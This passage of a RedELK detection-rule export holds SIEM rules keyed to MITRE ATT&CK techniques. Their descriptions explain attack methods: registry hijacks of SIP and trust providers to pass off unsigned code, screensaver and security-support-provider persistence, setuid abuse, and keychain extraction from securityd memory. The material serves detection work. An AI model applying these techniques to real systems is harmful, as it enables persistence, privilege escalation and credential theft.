manipulate the data as it is accessed and displayed to an end user.[1][2] By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.\nAdversaries may alter application binaries used to display data in order to cause runtime manipulations. Adversaries may also conduct Change Default File Association and Masquerading to cause a similar effect. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1494","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1494] Runtime Data Manipulation","query":"threat.technique.id: T1494","references":["https://attack.mitre.org/techniques/T1494","https://attack.mitre.org/techniques/T1565/003"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1494","name":"Runtime Data Manipulation","id":"T1494"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0040","name":"Impact","id":"TA0040"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. [1] An account can hold additional SIDs in the SID-History Active Directory attribute [2], allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).\nWith Domain Administrator (or equivalent) rights, harvested or well-known SID values [3] may be inserted into SID-History to enable impersonation of arbitrary users/groups such as Enterprise Administrators. This manipulation may result in elevated access to local resources and/or access to otherwise inaccessible domains via lateral movement techniques such as Remote Services, Windows Admin Shares, or Windows Remote Management.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1178","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1178] SID-History Injection","query":"threat.technique.id: T1178","references":["https://attack.mitre.org/techniques/T1178","https://attack.mitre.org/techniques/T1134/005"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1178","name":"SID-History Injection","id":"T1178"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may tamper with SIP and trust provider components to mislead the operating system and application control tools when conducting signature validation checks. In user mode, Windows Authenticode [1] digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function, [2] which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. [3]\nBecause of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs) [4] to provide a layer of abstraction between API functions and files. SIPs are responsible for enabling API functions to create, retrieve, calculate, and verify signatures. Unique SIPs exist for most file formats (Executable, PowerShell, Installer, etc., with catalog signing providing a catch-all [5]) and are identified by globally unique identifiers (GUIDs). [3]\nSimilar to Code Signing, adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and application control tools to classify malicious (or any) code as signed by: [3]\nModifying the Dll and FuncName Registry values in HKLM\\SOFTWARE[\\WOW6432Node]Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllGetSignedDataMsg{{SIP_GUID}} that point to the dynamic link library (DLL) providing a SIP’s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file. By pointing to a maliciously-crafted DLL with an exported function that always returns a known good signature value (ex: a Microsoft signature for Portable Executables) rather than the file’s real signature, an adversary can apply an acceptable signature value to all files using that SIP [6] (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).\nModifying the Dll and FuncName Registry values in HKLM\\SOFTWARE[WOW6432Node]Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllVerifyIndirectData{{SIP_GUID}} that point to the DLL providing a SIP’s CryptSIPDllVerifyIndirectData function, which validates a file’s computed hash against the signed hash value. By pointing to a maliciously-crafted DLL with an exported function that always returns TRUE (indicating that the validation was successful), an adversary can successfully validate any file (with a legitimate signature) using that SIP [6] (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.\nModifying the DLL and Function Registry values in HKLM\\SOFTWARE[WOW6432Node]Microsoft\\Cryptography\\Providers\\Trust\\FinalPolicy{{trust provider GUID}} that point to the DLL providing a trust provider’s FinalPolicy function, which is where the decoded and parsed signature is checked and the majority of trust decisions are made. Similar to hijacking SIP’s CryptSIPDllVerifyIndirectData function, this value can be redirected to a suitable exported function from an already present DLL or a maliciously-crafted DLL (though the implementation of a trust provider is complex).\nNote: The above hijacks are also possible without modifying the Registry via DLL Search Order Hijacking.\nHijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. [3]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1198","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1198] SIP and Trust Provider Hijacking","query":"threat.technique.id: T1198","references":["https://attack.mitre.org/techniques/T1198","https://attack.mitre.org/techniques/T1553/003"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1198","name":"SIP and Trust Provider Hijacking","id":"T1198"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1198","name":"SIP and Trust Provider Hijacking","id":"T1198"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.[1]\nAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1053","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1053] Scheduled Task","query":"threat.technique.id: T1053","references":["https://attack.mitre.org/techniques/T1053"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1053","name":"Scheduled Task","id":"T1053"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1053","name":"Scheduled Task","id":"T1053"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1053","name":"Scheduled Task","id":"T1053"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may hijack a legitimate user's SSH session to move laterally within an environment. Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.\nIn order to move laterally from a compromised host, adversaries may take advantage of trust relationships established with other systems via public key authentication in active SSH sessions by hijacking an existing connection to another system. This may occur through compromising the SSH agent itself or by having access to the agent's socket. If an adversary is able to obtain root access, then hijacking SSH sessions is likely trivial.[1][2][3][4]\nSSH Hijacking differs from use of SSH because it hijacks an existing SSH session rather than creating a new session using Valid Accounts.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1184","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1184] SSH Hijacking","query":"threat.technique.id: T1184","references":["https://attack.mitre.org/techniques/T1184","https://attack.mitre.org/techniques/T1563/001"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1184","name":"SSH Hijacking","id":"T1184"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0008","name":"Lateral Movement","id":"TA0008"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability.\nWhen scheduled exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as Exfiltration Over C2 Channel or Exfiltration Over Alternative Protocol.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1029","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1029] Scheduled Transfer","query":"threat.technique.id: T1029","references":["https://attack.mitre.org/techniques/T1029"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1029","name":"Scheduled Transfer","id":"T1029"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0010","name":"Exfiltration","id":"TA0010"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as CopyFromScreen, xwd, or screencapture.[1][2]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1113","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1113] Screen Capture","query":"threat.technique.id: T1113","references":["https://attack.mitre.org/techniques/T1113"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1113","name":"Screen Capture","id":"T1113"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0009","name":"Collection","id":"TA0009"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Scripting","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1064","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1064] Scripting","query":"threat.technique.id: T1064","references":["https://attack.mitre.org/techniques/T1064","https://attack.mitre.org/techniques/T1059"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1064","name":"Scripting","id":"T1064"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1064","name":"Scripting","id":"T1064"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.[1] The Windows screensaver application scrnsave.scr is located in C:\\Windows\\System32\\, and C:\\Windows\\sysWOW64\\ on 64-bit Windows systems, along with screensavers included with base Windows installations.\nThe following screensaver settings are stored in the Registry (HKCU\\Control Panel\\Desktop\\) and could be manipulated to achieve persistence:\nSCRNSAVE.exe - set to malicious PE path\nScreenSaveActive - set to '1' to enable the screensaver\nScreenSaverIsSecure - set to '0' to not require a password to unlock\nScreenSaveTimeout - sets user inactivity timeout before screensaver is executed\nAdversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity. [2]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1180","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1180] Screensaver","query":"threat.technique.id: T1180","references":["https://attack.mitre.org/techniques/T1180","https://attack.mitre.org/techniques/T1546/002"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1180","name":"Screensaver","id":"T1180"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\nExample commands that can be used to obtain security software information are netsh, reg query with Reg, dir with cmd, and Tasklist, but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for. It is becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.\nAdversaries may also utilize cloud APIs to discover the configurations of firewall rules within an environment.[1]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1063","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1063] Security Software Discovery","query":"threat.technique.id: T1063","references":["https://attack.mitre.org/techniques/T1063","https://attack.mitre.org/techniques/T1518/001"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1063","name":"Security Software Discovery","id":"T1063"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0007","name":"Discovery","id":"TA0007"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.\nThe SSP configuration is stored in two Registry keys: HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Security Packages and HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.[1]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1101","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1101] Security Support Provider","query":"threat.technique.id: T1101","references":["https://attack.mitre.org/techniques/T1101","https://attack.mitre.org/techniques/T1547/005"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1101","name":"Security Support Provider","id":"T1101"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"An adversary may obtain root access (allowing them to read securityd’s memory), then they can scan through memory to find the correct sequence of keys in relatively few tries to decrypt the user’s logon keychain. This provides the adversary with all the plaintext passwords for users, WiFi, mail, browsers, certificates, secure notes, etc.[1] [2]\nIn OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple’s keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords. [1] [3] Apple’s securityd utility takes the user’s logon password, encrypts it with PBKDF2, and stores this master key in memory. Apple also uses a set of keys and algorithms to encrypt the user’s password, but once the master key is found, an attacker need only iterate over the other values to unlock the final password.[1]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1167","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1167] Securityd Memory","query":"threat.technique.id: T1167","references":["https://attack.mitre.org/techniques/T1167","https://attack.mitre.org/techniques/T1555/002"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1167","name":"Securityd Memory","id":"T1167"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0006","name":"Credential Access","id":"TA0006"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may abuse legitimate extensible development features of servers to establish persistent access to systems. Enterprise server applications may include features that allow developers to write and install software or scripts to extend the functionality of the main application. Adversaries may install malicious components to extend and abuse server applications.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1505","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1505] Server Software Component","query":"threat.technique.id: T1505","references":["https://attack.mitre.org/techniques/T1505"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1505","name":"Server Software Component","id":"T1505"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (services.exe) is an interface to manage and manipulate services.[1] The service control manager is accessible to users via GUI components as well as system utilities such as sc.exe and Net.\nPsExec can also be used to execute commands or payloads via a temporary Windows service created through the service control manager API.[2]\nAdversaries may leverage these mechanisms to execute malicious content. This can be done by either executing a new or modified service. This technique is the execution used in conjunction with Windows Service during service persistence or privilege escalation.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1035","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1035] Service Execution","query":"threat.technique.id: T1035","references":["https://attack.mitre.org/techniques/T1035","https://attack.mitre.org/techniques/T1569/002"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1035","name":"Service Execution","id":"T1035"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.[1][2]\nAdversaries may accomplish this by disabling individual services of high importance to an organization, such as MSExchangeIS, which will make Exchange content inaccessible [2]. In some cases, adversaries may stop or disable many or all services to render systems unusable.[1] Services may not allow for modification of their data stores while running. Adversaries may stop services in order to conduct Data Destruction or Data Encrypted for Impact on the data stores of services like Exchange and SQL Server.[3]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1489","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1489] Service Stop","query":"threat.technique.id: T1489","references":["https://attack.mitre.org/techniques/T1489"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1489","name":"Service Stop","id":"T1489"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0040","name":"Impact","id":"TA0040"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start. Windows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, PowerShell, or Reg. Access to Registry keys is controlled through Access Control Lists and permissions. [1]\nIf the permissions for users and groups are not properly set and allow access to the Registry keys for a service, then adversaries can change the service binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, then the adversary-controlled program will execute, allowing the adversary to gain persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).\nAdversaries may also alter Registry keys associated with service failure parameters (such as FailureCommand) that may be executed in an elevated context anytime the service fails or is intentionally corrupted.[2][3]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1058","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1058] Service Registry Permissions Weakness","query":"threat.technique.id: T1058","references":["https://attack.mitre.org/techniques/T1058","https://attack.mitre.org/techniques/T1574/011"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1058","name":"Service Registry Permissions Weakness","id":"T1058"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1058","name":"Service Registry Permissions Weakness","id":"T1058"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"An adversary may perform shell escapes or exploit vulnerabilities in an application with the setsuid or setgid bits to get code running in a different user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application, the application will run with the privileges of the owning user or group respectively. [1]. Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them doesn’t need the elevated privileges.\nInstead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications. These bits are indicated with an \"s\" instead of an \"x\" when viewing a file's attributes via ls -l. The chmod program can set these bits with via bitmasking, chmod 4777 [file] or via shorthand naming, chmod u+s [file].\nAdversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future.[2].","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1166","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1166] Setuid and Setgid","query":"threat.technique.id: T1166","references":["https://attack.mitre.org/techniques/T1166","https://attack.mitre.org/techniques/T1548/001"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1166","name":"Setuid and Setgid","id":"T1166"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1166","name":"Setuid and Setgid","id":"T1166"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Shared Webroot","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1051","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1051] Shared Webroot","query":"threat.technique.id: T1051","references":["https://attack.mitre.org/techniques/T1051"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1051","name":"Shared Webroot","id":"T1051"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0008","name":"Lateral Movement","id":"TA0008"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may create or edit shortcuts to run a program during system boot or user login. Shortcuts or symbolic links are ways of referencing other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.\nAdversaries could use shortcuts to execute their tools for persistence. They may create a new shortcut as a means of indirection that may use Masquerading to look like a legitimate program. Adversaries could also edit the target path or entirely replace an existing shortcut so their tools will be executed instead of the intended legitimate program.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1023","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1023] Shortcut Modification","query":"threat.technique.id: T1023","references":["https://attack.mitre.org/techniques/T1023","https://attack.mitre.org/techniques/T1547/009"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1023","name":"Shortcut Modification","id":"T1023"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed binaries. Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1218","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1218] Signed Binary Proxy Execution","query":"threat.technique.id: T1218","references":["https://attack.mitre.org/techniques/T1218"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1218","name":"Signed Binary Proxy Execution","id":"T1218"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1218","name":"Signed Binary Proxy Execution","id":"T1218"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} -{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may use scripts signed with trusted certificates to proxy execution of malicious files. Several Microsoft signed scripts that are default on Windows installations can be used to proxy execution of other files. This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems.[1]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1216","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1216] Signed Script Proxy Execution","query":"threat.technique.id: T1216","references":["https://attack.mitre.org/techniques/T1216"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE 